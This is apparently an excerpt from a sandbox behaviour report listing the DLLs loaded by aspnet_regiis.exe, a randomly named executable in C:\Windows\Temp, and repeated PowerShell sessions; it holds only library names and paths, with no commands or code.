Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Temp\mxtvcgq32fe.exe	Section loaded: mscoree.dll
Source: C:\Windows\Temp\mxtvcgq32fe.exe	Section loaded: apphelp.dll
Source: C:\Windows\Temp\mxtvcgq32fe.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Temp\mxtvcgq32fe.exe	Section loaded: version.dll
Source: C:\Windows\Temp\mxtvcgq32fe.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Temp\mxtvcgq32fe.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Temp\mxtvcgq32fe.exe	Section loaded: wldp.dll
Source: C:\Windows\Temp\mxtvcgq32fe.exe	Section loaded: amsi.dll
Source: C:\Windows\Temp\mxtvcgq32fe.exe	Section loaded: userenv.dll
Source: C:\Windows\Temp\mxtvcgq32fe.exe	Section loaded: profapi.dll
Source: C:\Windows\Temp\mxtvcgq32fe.exe	Section loaded: msasn1.dll
Source: C:\Windows\Temp\mxtvcgq32fe.exe	Section loaded: gpapi.dll
Source: C:\Windows\Temp\mxtvcgq32fe.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll
